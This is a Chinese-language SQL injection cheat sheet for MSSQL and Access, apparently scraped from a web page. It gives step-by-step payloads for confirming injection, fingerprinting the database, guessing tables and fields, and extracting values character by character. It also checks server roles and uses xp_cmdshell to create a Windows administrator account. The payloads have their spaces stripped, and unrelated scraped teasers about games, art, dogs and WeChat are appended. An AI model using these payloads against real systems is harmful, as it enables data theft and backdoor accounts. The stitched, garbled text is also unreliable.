1.判断是否有注入
;and1=1
;and1=2
2.初步判断是否是mssql
;anduser>0
3.注入参数是字符
'and[查询条件]and''='
4.搜索时没过滤参数的
'and[查询条件]and'%25'='
5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6.猜数据库
;and(SelectCount(*)from[数据库名])>0
7.猜字段
;and(SelectCount(字段名)from数据库名)>0
8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0
9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0
(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0
10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
本文导读目录: 1、求攻城掠地单机版 2、攻城掠地 有没有免费的辅助工具 3、电脑版攻城掠地怎么在手机上玩 4、电脑病毒在军事中的应用 5、攻城掠地单机版下载地址 6、攻城掠地手游...
近日,“品艺中欧”2020中欧国际文化艺术节作品征集及优秀作品展示活动圆满结束。活动由中国人民对外友好协会主办,中欧国际文化艺术节组委会承办。“品艺中欧”2020中欧国际文...
说起泰迪,自然无人不知,无人不晓。泰迪常常被黑,日天日地日空气,招黑的优质犹如某爽明星。不过,越是招黑,越是有人喜爱。这跟明星闹点绯闻,反而会更受欢迎一个道理。 泰迪宝宝也很聪明,在智商上仅...
编辑导语:对付产物司理来说,假如方才接办了一个新平台,应该如何正确的迭代进级已有的架构呢?本文作者分享了筹划平台架构的几个很重要的点,但愿看后可以或许对你有所开导。 有幸获得承认,接上篇《平台产物司...
每日要闻不能查出具体是谁登陆的,只能查出是在什么设备上登陆过,具体方法如下4个步骤: 一,在客户端找到“微信”并打开登录; 二,登录后点击“我”这个按钮,然后选择最底端“设置”按钮; 三,进入到...
只要备份库没改,肯定都会恢复的,改数据必须主库和备份库一起修改才行 各行各业都有一个价值的问题,你觉得就一分,不值,但你能改得了吗?如果因为这一分,你出不了国,你用十个6000能换回来吗?这就是价值的...